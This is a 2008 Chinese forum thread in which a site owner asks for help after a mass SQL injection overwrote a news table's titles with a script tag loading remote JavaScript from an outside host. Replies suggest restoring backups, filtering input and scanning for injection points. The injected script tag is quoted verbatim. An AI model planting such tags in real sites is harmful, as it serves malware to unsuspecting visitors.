紧急求助

都市打工者发布于 2008-05-09 15:13， 1073 次点击

数据库中的新闻表的title字段数据被update 了，所有数据后半部分都被 <script src=http://sb.5252.ws:88/107/1.js> </script>替换了

B/S系统，asp +sqlserver2005

问题如下：
1：病毒名称是？
2：病毒是在服务器段还是在客户端？也就是说，病毒是有客户段提交数据时发生的还是服务器上病毒自动更新数据库中的内容？
3：有何解决方法？

大家可否给点建议，有相关文章也可以。

12 回复

madpbpl2008-05-09 15:27

病毒名称不知道
网站先停了，数据替换
杀毒
（联系管理员）检查服务器其他站点是否有影响
重新上传

都市打工者2008-05-11 14:25

真的没有人知道啊,诶,郁闷

yms1232008-05-11 15:20

新闻表被update加入病毒代码的新闻，是否是同一个人录入的？

都市打工者2008-05-11 20:39

不是啊.我现在新闻表的字段n_title的所有数据都被人串改了,呵呵,并且串改的内容都一样的,你到摆渡搜索一下<script src=http://sb.5252.ws:88/107/1.js> </script>这个，现在很多网站都是出现同一个问题

hxfly2008-05-11 21:35

可能是数据库服务器被入侵吧？
如果是通过你本身程序添加的数据，应该在数据添加前过滤。

都市打工者2008-05-13 11:25

怎么没有人解决啊?因为网上最近出现很多这样的情况的,呵呵

hxfly2008-05-13 11:47

如果你的SQL服务器被入侵了，那不是程序的问题，所以没办法帮你解决

chb5926573702008-05-13 12:03

有数据库备份或者是数据库日志文件的备份吗？你数据库是不是每天备份的，重新还原下数据库！

#10

都市打工者2008-05-13 13:41

还原是没有用的啊,最近网上很多这样的问题的，治标不治本啊.现在不知道是哪个问题了,我的是sql2005数据库与2003系统.呵呵.可能是 sql注入攻击.你们有好的防这个注入方法啊?

#11

都市打工者2008-05-13 14:18

#12

yms1232008-05-13 15:03

记得有一个SQL注入工具叫桂林老兵，那个工具可以对网站的SQL注入点进行扫描，楼主先扫描一下自己的网站有没有可攻击的SQL注入点。

#13

都市打工者2008-05-13 20:07

好的,先试试先,谢谢